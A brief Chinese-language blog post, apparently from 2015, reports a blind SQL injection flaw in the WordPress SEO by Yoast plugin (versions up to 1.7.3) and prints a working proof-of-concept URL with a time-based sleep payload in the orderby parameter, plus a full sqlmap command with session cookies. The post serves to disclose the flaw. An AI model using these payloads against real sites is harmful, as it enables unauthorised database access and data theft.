這個外掛在幫助網站作 SEO,最近被發現漏洞,可以被 SQL Injection,也有已知攻擊方式,影響著 1.7.3 以下的版本

wordpress seo by yoast - blind sql injection

以下為攻擊方式 POC

http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date%2c(select%20*%20from%20(select(sleep(10)))a)&order=asc
Using SQLMap:

python sqlmap.py -u "http://127.0.0.1/wp-admin/admin.php?page=wpseo_bulk-editor&type=title&orderby=post_date*&order=asc" --batch --technique=B --dbms=MySQL --cookie="wordpress_9d...; wordpress_logged_in_9dee67...;"

參考 WordPress SEO by Yoast <= 1.7.3.3 – Blind SQL Injection

最後修改日期: 2015 年 03 月 15 日

作者

留言

撰寫回覆或留言

發佈留言必須填寫的電子郵件地址不會公開。